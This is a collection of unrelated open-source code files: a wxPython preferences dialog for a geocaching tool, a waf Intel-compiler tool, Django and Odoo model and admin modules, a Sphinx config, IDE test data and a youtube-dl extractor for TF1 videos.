        self.acctIsPremium.SetValue(False)
        self.acctIsTeam.Disable()
        self.acctIsTeam.SetValue(False)
        self.btnSaveAccount.Disable()
    def loadOrigins(self):
        """Rebuild the search-origin locations list from the database."""
        self.locations.DeleteAllItems()
        self.locations.DeleteAllColumns()
        w,h = self.GetTextExtent("QQQQQQQQQQQQQQQQQQ")
        self.locations.InsertColumn(0, 'Location Name', width=w)
        for loc in cache901.util.getSearchLocs():
            sid = self.locations.Append((loc.name,))
            self.locations.SetItemData(sid, loc.wpt_id)
    def loadGUIPreferences(self):
        """Populate the column-order list from the saved configuration."""
        # get the current column order list from the config
        cfg = cache901.cfg()
        orderList = cfg.cachecolumnorder
        for column in orderList:
            self.colOrderList.InsertStringItem(orderList.index(column), column)
    def OnAddAccount(self, evt):
        """Create a placeholder account row, persist it, and select it."""
        # NOTE(review): uses cache901.sadbobjects here while every other
        # method uses the bare `sadbobjects` import — same module, but worth
        # unifying.
        acct = cache901.sadbobjects.Accounts()
        acct.username = 'unknown'
        acct.password = ''
        acct.ispremium = False
        acct.isteam = False
        acct.sitename = self.acctType.GetItems()[0]
        cache901.db().add(acct)
        cache901.db().commit()
        self.loadAccounts()
        self.accountNames.Select(self.accountNames.FindItemData(0, acct.accountid))
    def OnRemAccount(self, evt):
        """Delete the selected account from the database."""
        acctid = self.accountNames.GetFirstSelected()
        if acctid > -1:
            acct = cache901.db().query(sadbobjects.Accounts).get(self.accountNames.GetItemData(acctid))
            cache901.db().delete(acct)
            cache901.db().commit()
            self.loadAccounts()
    def OnLoadAccount(self, evt):
        """Load the selected account into the detail widgets and enable them."""
        acctid = self.accountNames.GetFirstSelected()
        if acctid > -1:
            acct = cache901.db().query(sadbobjects.Accounts).get(self.accountNames.GetItemData(acctid))
            self.btnRemAccount.Enable()
            self.acctType.Enable()
            self.acctType.SetValue(acct.sitename)
            self.acctUsername.Enable()
            self.acctUsername.SetValue(acct.username)
            self.acctPassword.Enable()
            self.acctPassword.SetValue(acct.password)
            self.acctIsPremium.Enable()
            self.acctIsPremium.SetValue(acct.ispremium)
            self.acctIsTeam.Enable()
            self.acctIsTeam.SetValue(acct.isteam)
            self.btnSaveAccount.Enable()
    def OnSaveAccount(self, evt):
        """Write the detail widgets back to the selected account and commit."""
        acctid = self.accountNames.GetFirstSelected()
        if acctid > -1:
            acct = cache901.db().query(sadbobjects.Accounts).get(self.accountNames.GetItemData(acctid))
            acct.sitename = self.acctType.GetValue()
            acct.username = self.acctUsername.GetValue()
            acct.password = self.acctPassword.GetValue()
            acct.ispremium = self.acctIsPremium.GetValue()
            acct.isteam = self.acctIsTeam.GetValue()
            cache901.db().commit()
            self.loadAccounts()
    # The show* helpers open the dialog modally on a specific tab.
    def showGeneral(self):
        """Open the dialog on the General tab."""
        self.tabs.ChangeSelection(0)
        self.ShowModal()
    def showSearch(self):
        """Open the dialog on the Search tab."""
        self.tabs.ChangeSelection(1)
        self.ShowModal()
    def showCacheDay(self):
        """Open the dialog on the Cache Day tab."""
        self.tabs.ChangeSelection(2)
        self.ShowModal()
    def showGeoAccounts(self):
        """Open the dialog on the GeoCaching Accounts tab."""
        self.tabs.ChangeSelection(3)
        self.ShowModal()
    def showGuiPrefs(self):
        """Open the dialog on the GUI Preferences tab."""
        self.tabs.ChangeSelection(4)
        self.ShowModal()
    def OnRemoveOrigin(self, evt):
        """Delete the selected search origin (loc_type == 2) from the DB."""
        sel = self.locations.GetFirstSelected()
        wptid = self.locations.GetItemData(sel)
        for loc in cache901.db().query(sadbobjects.Locations).filter(
            and_(
                sadbobjects.Locations.loc_type == 2,
                sadbobjects.Locations.wpt_id == wptid,
            )):
            cache901.db().delete(loc)
        cache901.db().commit()
        self.loadOrigins()
        cache901.db().commit()
    def OnAddOrigin(self, evt):
        """Add or update a search origin from the name/lat/lon widgets.

        Reuses the selected location row when one is selected, otherwise
        creates a new one.  Invalid coordinates pop a message box and
        abort the save.
        """
        lid = self.locations.GetFirstSelected()
        if lid != -1:
            lid = self.locations.GetItemData(lid)
        else:
            # Sentinel id that can never match a row, forcing a fresh insert.
            lid = -999999
        wpt = cache901.db().query(sadbobjects.Locations).get(lid)
        if wpt is None:
            wpt = sadbobjects.Locations()
            cache901.db().add(wpt)
        wpt.name = self.locName.GetValue()
        wpt.loc_type = 2
        if len(wpt.name) != 0:
            failed = False
            try:
                wpt.lat = str(cache901.util.dmsToDec(self.latitude.GetValue()))
                self.latitude.SetValue(wpt.lat)
            except cache901.util.InvalidDegFormat, msg:
                wx.MessageBox(str(msg), "Invalid Latitude", parent=self)
                failed = True
            try:
                wpt.lon = str(cache901.util.dmsToDec(self.longitude.GetValue()))
                self.longitude.SetValue(wpt.lon)
            except cache901.util.InvalidDegFormat, msg:
                wx.MessageBox(str(msg), "Invalid Longitude", parent=self)
                failed = True
            if not failed:
                cache901.db().commit()
                self.loadOrigins()
                wpt_id = self.locations.FindItemData(0, wpt.wpt_id)
                if wpt_id >= 0:
                    self.locations.Select(wpt_id)
                else:
                    self.locName.SetValue("")
                    self.latitude.SetValue("")
                    self.longitude.SetValue("")
        else:
            wx.MessageBox("Empty names cannot be saved", "Empty Name Error")
    def OnLoadOrigin(self, evt):
        """Load the activated origin's name and DMS coordinates into the widgets."""
        wptid = evt.GetData()
        wpt = cache901.db().query(sadbobjects.Locations).get(wptid)
        self.locName.SetValue(wpt.name)
        self.latitude.SetValue(cache901.util.latToDMS(wpt.lat))
        self.longitude.SetValue(cache901.util.lonToDMS(wpt.lon))
    def OnClearSelection(self, evt):
        """Deselect every row in the locations list."""
        lid = self.locations.GetFirstSelected()
        while lid != -1:
            self.locations.Select(lid, False)
            lid = self.locations.GetFirstSelected()
    def OnGetFromGPS(self, evt):
        """Read the current position from the configured GPS via GPSBabel
        and fill the latitude/longitude widgets."""
        # Get the path for GPSBabel, and make sure it's in use.
        fp = self.gpsbabelLoc.GetPath()
        gpsbabel.gps = gpsbabel.GPSBabel(fp)
        # Get the port the GPS is attached to
        selnum = self.gpsPort.GetSelection()
        if selnum == wx.NOT_FOUND:
            wx.MessageBox('Please select the GPS Port on the "General" page', 'Invalid GPS Port')
        items = self.gpsPort.GetItems()
        if selnum < 0 or selnum >= len(items):
            wx.MessageBox('Please select the GPS Port on the "General" page', 'Invalid GPS Port')
        else:
            port = items[selnum]
            if port == 'USB': port = 'usb:'
            # Get the type of GPS
            selnum = self.gpsType.GetSelection()
            if selnum == wx.NOT_FOUND:
                wx.MessageBox('Please select the GPS Type on the "General" page', 'Invalid GPS Type')
            items = self.gpsType.GetItems()
            if selnum < 0 or selnum >= len(items):
                wx.MessageBox('Please select the GPS Type on the "General" page', 'Invalid GPS Type')
            else:
                gpstype = items[selnum].lower()
                try:
                    wpt = gpsbabel.gps.getCurrentGpsLocation(port, gpstype)
                    self.latitude.SetValue(cache901.util.latToDMS(wpt.lat))
                    self.longitude.SetValue(cache901.util.lonToDMS(wpt.lon))
                except Exception, e:
                    wx.MessageBox(str(e), "An Error Occured")
    def listCacheDays(self):
        """Reload the cache-day list (sorted by name) and select the first day."""
        self.cacheDays.DeleteAllItems()
        for cday in cache901.db().query(sadbobjects.CacheDayNames).order_by(sadbobjects.CacheDayNames.dayname):
            self.cacheDays.Append((cday.dayname, ))
        if self.cacheDays.GetItemCount() > 0:
            self.cacheDays.Select(0)
            self.OnLoadCacheDay(None)
    def OnAddCacheDay(self, evt):
        """Prompt for a new cache-day name and persist it."""
        newname = wx.GetTextFromUser('New Cache Day:', 'Enter The Name', parent=self)
        if newname != '':
            day = sadbobjects.CacheDayNames()
            day.dayname = newname
            # NOTE(review): adds via sadbobjects.DBSession while the rest of
            # the class uses cache901.db() — verify these are the same session.
            sadbobjects.DBSession.add(day)
            cache901.db().commit()
            self.listCacheDays()
    def OnRemCacheDay(self, evt):
        """Delete every selected cache day after per-day confirmation."""
        # NOTE(review): no commit() before the reload below, unlike the other
        # mutating handlers — the deletions may not persist; verify.
        iid = self.cacheDays.GetFirstSelected()
        while iid != -1:
            dname = self.cacheDays.GetItemText(iid)
            day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
            if wx.MessageBox('Really delete cache day %s?' % dname, 'Remove Cache Day', style=wx.YES_NO, parent=self) == wx.YES:
                cache901.db().delete(day)
            iid = self.cacheDays.GetNextSelected(iid)
        self.listCacheDays()
    def OnRenameCacheDay(self, evt):
        """Rename the selected cache day and re-link its caches to the new name."""
        iid=self.cacheDays.GetFirstSelected()
        if iid != -1:
            dname = self.cacheDays.GetItemText(iid)
            newdname = wx.GetTextFromUser('Rename %s to what?' % dname, 'Rename Cache Day').strip()
            if newdname != '':
                day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
                day.dayname = newdname
                for c in day.caches:
                    c.dayname = newdname
                cache901.db().commit()
                self.listCacheDays()
            else:
                wx.MessageBox('Cowardly refusing to rename a day to an empty name', 'Bad Cache Day Name', wx.ICON_EXCLAMATION)
    def OnCacheUp(self, evt):
        """Move the selected cache one slot earlier in the selected day."""
        iid = self.cacheDays.GetFirstSelected()
        dname = self.cacheDays.GetItemText(iid)
        day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
        iid = self.cachesForDay.GetFirstSelected()
        if iid > 0:
            cache = day.caches[iid]
            del day.caches[iid]
            day.caches.insert(iid-1, cache)
            day.reindex()
            cache901.db().commit()
            self.OnLoadCacheDay(evt)
            self.cachesForDay.Select(iid-1)
    def OnCacheDown(self, evt):
        """Move the selected cache one slot later in the selected day."""
        iid = self.cacheDays.GetFirstSelected()
        dname = self.cacheDays.GetItemText(iid)
        day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
        iid = self.cachesForDay.GetFirstSelected()
        if iid < len(day.caches)-1:
            cache = day.caches[iid]
            del day.caches[iid]
            day.caches.insert(iid+1, cache)
            day.reindex()
            cache901.db().commit()
            self.OnLoadCacheDay(evt)
            self.cachesForDay.Select(iid+1)
    def OnAddCache(self, evt):
        """Append every selected available cache to the selected cache day."""
        iid = self.cacheDays.GetFirstSelected()
        dname = self.cacheDays.GetItemText(iid)
        day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
        if not day:
            return
        iid = self.availCaches.GetFirstSelected()
        while iid != -1:
            waypoint = sadbobjects.CacheDay()
            cache = cache901.db().query(sadbobjects.Caches).get(self.availCaches.GetItemData(iid))
            waypoint.cache_id = cache.cache_id
            # cache_type 1 == geocache entry (see OnLoadCacheDay below).
            waypoint.cache_type = 1
            day.caches.append(waypoint)
            iid = self.availCaches.GetNextSelected(iid)
        cache901.db().commit()
        self.OnLoadCacheDay(evt)
    def OnRemCache(self, evt):
        """Remove every selected cache from the selected cache day."""
        iid = self.cacheDays.GetFirstSelected()
        dname = self.cacheDays.GetItemText(iid)
        day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
        iid = self.cachesForDay.GetFirstSelected()
        delme = []
        while iid != -1:
            delme.append(iid)
            iid = self.cachesForDay.GetNextSelected(iid)
        # Delete from the highest index down so earlier indexes stay valid.
        delme.reverse()
        for idx in delme:
            cache901.db().delete(day.caches[idx])
        cache901.db().commit()
        self.OnLoadCacheDay(evt)
    def OnLoadCacheDay(self, evt):
        """Fill the caches-for-day list for the selected cache day.

        cache_type 1 rows are geocaches (url_name), cache_type 2 rows are
        plain locations (loc.name).
        """
        iid = self.cacheDays.GetFirstSelected()
        dname = self.cacheDays.GetItemText(iid)
        day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
        self.cachesForDay.DeleteAllItems()
        for cache in day.caches:
            if cache.cache_type == 1:
                iid = self.cachesForDay.Append((cache.cache.url_name, ))
                self.cachesForDay.SetItemData(iid, cache.cache_id)
            elif cache.cache_type == 2:
                iid = self.cachesForDay.Append((cache.loc.name, ))
                self.cachesForDay.SetItemData(iid, cache.cache_id)
    def OnColMoveUp(self, evt):
        """Move the selected column one slot up and persist the new order."""
        index = self.colOrderList.GetFirstSelected()
        newIndex = index - 1
        itemText = self.colOrderList.GetItemText(index)
        self.colOrderList.DeleteItem(index)
        self.colOrderList.InsertStringItem(newIndex, itemText)
        self.colOrderList.Select(newIndex)
        self.saveColumnOrder()
    def OnColMoveDown(self, evt):
        """Move the selected column one slot down and persist the new order."""
        index = self.colOrderList.GetFirstSelected()
        newIndex = index + 1
        itemText = self.colOrderList.GetItemText(index)
        self.colOrderList.DeleteItem(index)
        self.colOrderList.InsertStringItem(newIndex, itemText)
        self.colOrderList.Select(newIndex)
        self.saveColumnOrder()
    def OnColumnSelect(self, evt):
        """Enable/disable the move buttons at the list boundaries."""
        maxIndex = self.colOrderList.GetItemCount()
        index = self.colOrderList.GetFirstSelected()
        if index == 0:
            self.colMoveUpButton.Disable()
            self.colMoveDownButton.Enable()
        elif index == maxIndex - 1:
            self.colMoveUpButton.Enable()
            self.colMoveDownButton.Disable()
        else:
            self.colMoveUpButton.Enable()
            self.colMoveDownButton.Enable()
    def OnColumnDeselect(self, evt):
        """Disable both move buttons when nothing is selected."""
        index = self.colOrderList.GetFirstSelected()
        if index == -1:
            self.colMoveUpButton.Disable()
            self.colMoveDownButton.Disable()
    def saveColumnOrder(self):
        """Persist the on-screen column order to the configuration."""
        # get the column titles in the order they appear now
        newOrderList = map(lambda idx: self.colOrderList.GetItemText(idx), range(self.colOrderList.GetItemCount()))
        # save the new order list to the config
        cfg = cache901.cfg()
        cfg.cachecolumnorder = newOrderList
        self.colsRearranged = True
    def forWingIde(self):
        """
        This method shouldn't ever be called, since it's a do nothing
        method. However, by having it in here, Wing IDE can provide
        autocompletion, and it won't interfere with anything else, so here
        it is.
        """
        # Overall Dialog
        isinstance(self.tabs, wx.Notebook)
        # General Tab
        isinstance(self.general, wx.Panel)
        isinstance(self.coordDisplay, wx.Choice)
        isinstance(self.gpsType, wx.Choice)
        isinstance(self.gpsPort, wx.Choice)
        isinstance(self.gpsbabelLoc, wx.FilePickerCtrl)
        isinstance(self.gpsbabelPath, wx.StaticText)
        isinstance(self.getFromGPS, wx.Button)
        isinstance(self.maxLogs, wx.SpinCtrl)
        # Search Tab
        isinstance(self.search, wx.Panel)
        isinstance(self.locations, wx.ListCtrl)
        isinstance(self.locName, wx.TextCtrl)
        isinstance(self.latitude, wx.TextCtrl)
        isinstance(self.longitude, wx.TextCtrl)
        isinstance(self.addLoc, wx.Button)
        isinstance(self.remLoc, wx.Button)
        isinstance(self.clearSel, wx.Button)
        isinstance(self.locSplit, wx.SplitterWindow)
        # Cache Day Tab
        isinstance(self.cacheday, wx.Panel)
        isinstance(self.addCacheDay, wx.Button)
        isinstance(self.remCacheDay, wx.Button)
        isinstance(self.btnRenameCacheDay, wx.Button)
        isinstance(self.upCache, wx.BitmapButton)
        isinstance(self.downCache, wx.BitmapButton)
        isinstance(self.addCache, wx.BitmapButton)
        isinstance(self.remCache, wx.BitmapButton)
        isinstance(self.cacheDays, wx.ListCtrl)
        isinstance(self.cachesForDay, wx.ListCtrl)
        isinstance(self.availCaches, wx.ListCtrl)
        # Accounts Tab
        isinstance(self.acctTabSplit, wx.SplitterWindow)
        isinstance(self.accountNames, wx.ListCtrl)
        isinstance(self.btnAddAcount, wx.Button)
        isinstance(self.btnRemAccount, wx.Button)
        isinstance(self.acctType, wx.ComboBox)
        isinstance(self.acctUsername, wx.TextCtrl)
        isinstance(self.acctPassword, wx.TextCtrl)
        isinstance(self.acctIsTeam, wx.CheckBox)
        isinstance(self.acctIsPremium, wx.CheckBox)
        isinstance(self.btnSaveAccount, wx.Button)
        # GUI Preferences Tab
        isinstance(self.guiPreferences, wx.Panel)
        isinstance(self.colOrderList, wx.ListCtrl)
        isinstance(self.colMoveUpButton, wx.Button)
        isinstance(self.colMoveDownButton, wx.Button)
|
0-wiz-0/audacity
|
refs/heads/master
|
lib-src/lv2/suil/waflib/Tools/icpc.py
|
330
|
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys
from waflib.Tools import ccroot,ar,gxx
from waflib.Configure import conf
@conf
def find_icpc(conf):
	# Locate the Intel C++ compiler (icpc) and record it in the build
	# environment. Fatal configuration error if unsupported or not found.
	if sys.platform=='cygwin':
		conf.fatal('The Intel compiler does not work on Cygwin')
	v=conf.env
	cxx=None
	# honour an explicit CXX override: env first, then the OS environment
	if v['CXX']:cxx=v['CXX']
	elif'CXX'in conf.environ:cxx=conf.environ['CXX']
	# otherwise search PATH for the icpc binary
	if not cxx:cxx=conf.find_program('icpc',var='CXX')
	if not cxx:conf.fatal('Intel C++ Compiler (icpc) was not found')
	cxx=conf.cmd_to_list(cxx)
	# icc=True selects the Intel-specific branch of the gcc-style version probe
	conf.get_cc_version(cxx,icc=True)
	v['CXX']=cxx
	v['CXX_NAME']='icc'
def configure(conf):
	# Waf tool entry point: detect icpc, then reuse the g++ tool's common
	# flags and link configuration (icpc is gcc/g++ command-line compatible).
	# The call order matters: the compiler must be found before flags are set.
	conf.find_icpc()
	conf.find_ar()
	conf.gxx_common_flags()
	conf.gxx_modifier_platform()
	conf.cxx_load_tools()
	conf.cxx_add_flags()
	conf.link_add_flags()
|
proversity-org/edx-platform
|
refs/heads/master
|
openedx/core/djangoapps/credentials/admin.py
|
11
|
"""
Django admin pages for credentials support models.
"""
from config_models.admin import ConfigurationModelAdmin
from django.contrib import admin
from openedx.core.djangoapps.credentials.models import CredentialsApiConfig
class CredentialsApiConfigAdmin(ConfigurationModelAdmin):
    """Django admin page for the CredentialsApiConfig configuration model.

    ConfigurationModelAdmin already provides the display, history and
    current-config behaviour appropriate for config models, so no further
    customization is required.  A real docstring replaces the previous
    ``pylint: disable=missing-docstring`` suppression.
    """

admin.site.register(CredentialsApiConfig, CredentialsApiConfigAdmin)
|
caot/intellij-community
|
refs/heads/master
|
python/testData/quickFixes/PyMakeMethodStaticQuickFixTest/noSelf_after.py
|
249
|
__author__ = 'ktisha'
class Child(Base):
    # NOTE(review): this file is IDE quick-fix "after" test data; the test
    # compares its exact text, so any change here must be mirrored in the
    # corresponding test expectation — confirm before keeping these comments.
    def __init__(self):
        super(Child, self).__init__()
    @staticmethod
    def f():
        test = 1
|
ephes/ml_jobcontrol
|
refs/heads/master
|
ml_jobcontrol/ml_jobcontrol/models.py
|
1
|
# -*- encoding: utf-8 -*-
# Standard library imports
import logging
# Imports from core django
from django.db import models
# Imports from third party apps
from model_utils import Choices
from model_utils.models import StatusModel
from model_utils.models import TimeStampedModel
# Local imports
logger = logging.getLogger(__name__)
class MLDataSet(TimeStampedModel):
    # A named dataset identified by a unique download URL; optionally
    # owned by a user (null owner = system-wide dataset).
    name = models.CharField(max_length=100, unique=True)
    data_url = models.URLField(unique=True)
    owner = models.ForeignKey('auth.User', related_name='mldatasets',
        null=True, default=None)
class MLClassificationTestSet(TimeStampedModel):
    # A train/test split of a dataset: how many samples go to training
    # and how many to testing.
    mldataset = models.ForeignKey(MLDataSet)
    train_num = models.IntegerField()
    test_num = models.IntegerField()
    owner = models.ForeignKey('auth.User',
        related_name='mlclassificationtestsets', null=True, default=None)
class MLModel(TimeStampedModel):
    # A machine-learning model identified by its unique Python import path.
    name = models.CharField(max_length=100)
    import_path = models.CharField(max_length=100, unique=True)
    owner = models.ForeignKey('auth.User', related_name='mlmodels',
        null=True, default=None)
class MLModelConfig(models.Model):
    # An immutable JSON hyper-parameter configuration for a model.
    # `created` is tracked manually because this class deliberately does
    # not extend TimeStampedModel (configs are never updated).
    created = models.DateTimeField(auto_now_add=True)
    mlmodel = models.ForeignKey(MLModel, related_name='mlmodelconfigs')
    json_config = models.TextField(unique=True)
class MLScore(TimeStampedModel):
    # A named scoring metric (e.g. accuracy, f1), unique by name.
    name = models.CharField(max_length=100, unique=True)
class MLJob(StatusModel, TimeStampedModel):
    # One classification run: a model configuration evaluated against a
    # test set.  StatusModel contributes a `status` field restricted to
    # the STATUS choices below.
    STATUS = Choices('todo', 'in_progress', 'done')
    mlmodel_config = models.ForeignKey(MLModelConfig)
    mlclassification_testset = models.ForeignKey(MLClassificationTestSet)
class MLResultScore(models.Model):
    # One metric value produced by a finished job (job x metric -> score).
    mljob = models.ForeignKey(MLJob, related_name='scores')
    mlscore = models.ForeignKey(MLScore)
    score = models.FloatField()
|
samokspv/json-schema
|
refs/heads/master
|
docs/conf.py
|
74
|
# -*- coding: utf-8 -*-
#
# JsonSchema documentation build configuration file, created by
# sphinx-quickstart on Sat Dec 10 15:34:44 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# Sphinx configuration values for the JsonSchema docs build; everything
# below is the sphinx-quickstart scaffold with only project name/version
# customised — commented-out lines show the defaults.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'JsonSchema'
copyright = u'2011, Justin Rainbow, Bruno Prieto Reis'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'JsonSchemadoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'JsonSchema.tex', u'JsonSchema Documentation',
   u'Justin Rainbow, Bruno Prieto Reis', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'jsonschema', u'JsonSchema Documentation',
     [u'Justin Rainbow, Bruno Prieto Reis'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'JsonSchema', u'JsonSchema Documentation', u'Justin Rainbow, Bruno Prieto Reis',
   'JsonSchema', 'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
stannynuytkens/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/tf1.py
|
10
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
    """TF1 uses the wat.tv player."""
    # Matches TF1-family sites (videos/www/lci.tf1.fr, tfou, ushuaiatv,
    # histoire, tvbreizh); the named group captures the page slug.
    _VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
    _TESTS = [{
        'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
        'info_dict': {
            'id': '10635995',
            'ext': 'mp4',
            'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
            'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
        },
        'params': {
            # Sometimes wat serves the whole file with the --test option
            'skip_download': True,
        },
        'expected_warnings': ['HTTP Error 404'],
    }, {
        'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
        'info_dict': {
            'id': 'le-grand-mysterioso-chuggington-7085291-739',
            'ext': 'mp4',
            'title': 'Le grand Mystérioso - Chuggington',
            'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
            'upload_date': '20150103',
        },
        'params': {
            # Sometimes wat serves the whole file with the --test option
            'skip_download': True,
        },
        'skip': 'HTTP Error 410: Gone',
    }, {
        'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
        'only_matching': True,
    }, {
        'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
        'only_matching': True,
    }, {
        'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
        'only_matching': True,
    }]
    def _real_extract(self, url):
        # The media itself is hosted by wat.tv: scrape the 8-digit wat id
        # from the embedded player frame and delegate to the Wat extractor.
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)
        wat_id = self._html_search_regex(
            r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
            webpage, 'wat id', group='id')
        return self.url_result('wat:%s' % wat_id, 'Wat')
|
glovebx/odoo
|
refs/heads/8.0
|
addons/product/partner.py
|
385
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class res_partner(osv.osv):
    # Extend res.partner with a per-partner sale pricelist property.
    _name = 'res.partner'
    _inherit = 'res.partner'
    _columns = {
        # fields.property: company-dependent value stored via ir.property,
        # restricted to sale-type pricelists.
        'property_product_pricelist': fields.property(
            type='many2one',
            relation='product.pricelist',
            domain=[('type','=','sale')],
            string="Sale Pricelist",
            help="This pricelist will be used, instead of the default one, for sales to the current partner"),
    }
    def _commercial_fields(self, cr, uid, context=None):
        # propagate the pricelist from the commercial (parent) partner to
        # its contacts along with the standard commercial fields
        return super(res_partner, self)._commercial_fields(cr, uid, context=context) + ['property_product_pricelist']
